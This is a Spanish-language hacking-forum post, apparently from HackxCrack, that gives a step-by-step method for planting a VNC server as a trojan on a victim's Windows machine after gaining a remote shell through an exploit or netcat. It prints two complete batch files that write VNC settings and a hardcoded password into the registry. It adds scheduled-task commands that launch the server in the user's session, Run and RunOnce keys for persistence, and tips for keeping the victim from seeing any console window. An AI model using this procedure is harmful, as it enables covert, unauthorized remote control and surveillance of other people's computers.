Here i goooo....
El siguiente método para lograr instalar VNC como troyano en una víctima se compone de
4 pasos.
Paso 1 - Ejecutando el servidor VNC en la víctima0) Obtener una shell remota de la víctima.
El siguiente método, está específicamente desarrollado para el caso de shell remota obtenida con el uso de un exploit. Esta shell remota, tendrá privilegios de SYSTEM y será por tanto, un poco especial.
Este método también es válido para una shell remota obtenida a partir de netcat, con privilegios de USUARIO, aunq en este último caso, se puede llegar a lo mismo sin tanto rodeo.
1) Subir los 3 archivos necesarios para la ejecución del servidor VNC. (De esto ya se ha hablado antes...)
2) Subir 2 archivos .bat
addRegNow.bat:
@echo off
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d 32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
addReg.bat:
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d 32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\WINDOWS\system32\winvnc"
3) Agregar al registro de la víctima, la información de configuración del servidor VNC. Parte de esta información es la contraseña necesaria para admitir la conexión de clientes.
Vamos a agregar la información contenida en addRegNow.bat haciendo uso del comando at, es decir, programando una tarea.
Comprobamos la hora local de la víctima con
net time \\nombreequipovictimaProgramamos una tarea para los 2 minutos siguientes:
C:\WINDOWS\system32>at 0:58 "addregnow.bat"
at 0:58 "addregnow.bat"
Se ha agregado un nuevo trabajo con identificador = 1
Cuando llegue el momento, se ejecutará la tarea, no aparecerá ninguna ventana de ejecución del bat ??? y se agregará toda la información contenida en addRegNow.bat en la siguiente clave de registro ??? :
HKEY_USERS\.DEFAULT\Software\ORL
4) Cargar el ejecutable del servidor VNC llamando a winvnc.exe. Para ello, tenemos q programar una tarea y utilizar el parámetro /interactive
/interactive - Permite a la tarea interactuar con el escritorio del usuario cuya sesión coincide con el momento de ejecución de la tarea.
Si nos olvidamos de este detalle, winvnc.exe no correrá en el mismo entorno q el usuario víctima y no podremos acceder remotamente. Dará error de conexión...
C:\WINDOWS\system32>at 0:59 /interactive "winvnc.exe"
at 0:59 /interactive "winvnc.exe"
Se ha agregado un nuevo trabajo con identificador = 2
5) Después de comprobar con C:\at q no ha habido errores al ejecutar ambas tareas, podemos conectarnos remotamente con cualquier cliente vncviewer (si, cualquier!). Winvnc.exe aparecerá en la lista de tareas de la víctima bajo el Nombre de Usuario SYSTEM, pero magia potagia, se está ejecutando en el mismo entorno q el usuario víctima.
Paso 2 (Opcional) - Preparando la Instalación del servidor VNC como servicioSi queremos garantizarnos futuros accesos con el cliente VNC, tenemos q seguir los siguientes puntos...
1) Añadir a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOne una clave con la ejecución de addReg.bat. De esta forma, cuando el usuario reinicie Windows, se cargará la información de configuración del servidor VNC en:
HKEY_CURRENT_USER\Software\ORL\WinVNC3
Os preguntaréis, ¿pq hago esto 2 veces? Pues pq sino creamos la clave de configuracion en HKEY_CURRENT_USER\Software\ORL\WinVNC3, cuando el usuario inicie Windows, el servidor VNC no irá a buscar la clave en HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3, sino a HKEY_CURRENT_USER\Software\ORL\WinVNC3 y como no la encontrará, saltará la ventana de propiedades pidiendo la contraseña... Es un poco lioso, pero hacedme caso...
Bien, con el siguiente comando, crearemos la clave de inicio q añadirá el contenido de addReg al registro de la víctima.
C:\WINDOWS\system32>REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v Load /t REG_SZ /d "C:\WINDOWS\system32\addreg.bat"
Esta clave sólo se ejecutará una única vez (RunOnce) en el siguiente inicio de Windows de la víctima...
Ahora, podemos esperar a q la víctima reinicie...
Paso 3 (Opcional) - Instalando el servidor VNC como servicio0) La víctima reinicia y vuelve a iniciar Windows.
1) Cuando Windows se inicie, se ejecutará la clave de inicio en RunOnce y se cargará el contenido de addReg.bat:
En este momento, se cargará:
- la información de configuración del servidor VNC en la clave por defecto HKEY_CURRENT_USER\Software\ORL
- un clave de inicio en HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run para q el servidor VNC arranque automáticamente en sucesivos inicios de Windows.
- el servidor VNC, ejecutándose con privilegios de USUARIO. (Esto deriva del punto anterior...)
2) Nos podemos conectar remotamente con el cliente vncviewer...
Paso 4 (Opcional) - VNC Instalado como troyano0) En el siguiente reinicio de la víctima y posterior inicio de Windows ya habrá desaparecido la clave en RunOnce (1 única ejecución) y el servidor VNC se ejecutará automáticamente desde la clave de inicio en HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
2) Nos podemos conectar remotamente con el cliente vncviewer...
Bueno, eso es todo. Aún quedan una par de cosas en el a¡re, q no soy capaz de explicar y q espero no me causen alguna sorpresa desagradable en el futuro:
Cuando yo dejé el bat en HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run y el usuario iniciaba Windows, primero cargaba el escritorio y luego cargaba el bat. Por tanto, era un canteo pq aparecía la pantalla de consola.
¿Por qué si dejas el bat en HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce carga primero el bat y luego el escritorio y por tanto, no aparece tal ventana de consola??
Cuando llegue el momento, se ejecutará la tarea, no aparecerá ninguna ventana de ejecución del bat ??? y se agregará toda la información contenida en addRegNow.bat en la siguiente clave de registro ??? :
HKEY_USERS\.DEFAULT\Software\ORL
Cuando Zhuzura lo pruebe y le dé el visto bueno, me pongo manos a la obra con el tutorial...
Me he dado cuenta de lo costoso q resulta llevar todo esto a cabo. Estoy seguro de q exiten por ahí algunos "software de control remoto" q no requieren la utilización del registro para el manejo de la contraseña y q sólo con subirlos a la víctima y ejecutarlos, ya nos podemos conectar remotamente. Pero bueno, ya q empecé este hilo con VNC, voy a terminarlo bien, de forma satisfecha. Y además, de toda experiencia se saca algo provechoso. Hasta ahora, no me atrevía a jugar con el registro y después de esto, ya me muevo mucho mejor...
Hala... ha sido un dia intenso. Me voy a dormir....
Salu2
Pd: El truco de usar el contexto INTERACTIVE para la shell con privilegios de SYSTEM es cortesía de LooKilleR @ Foro de HackxCrack. Gracias...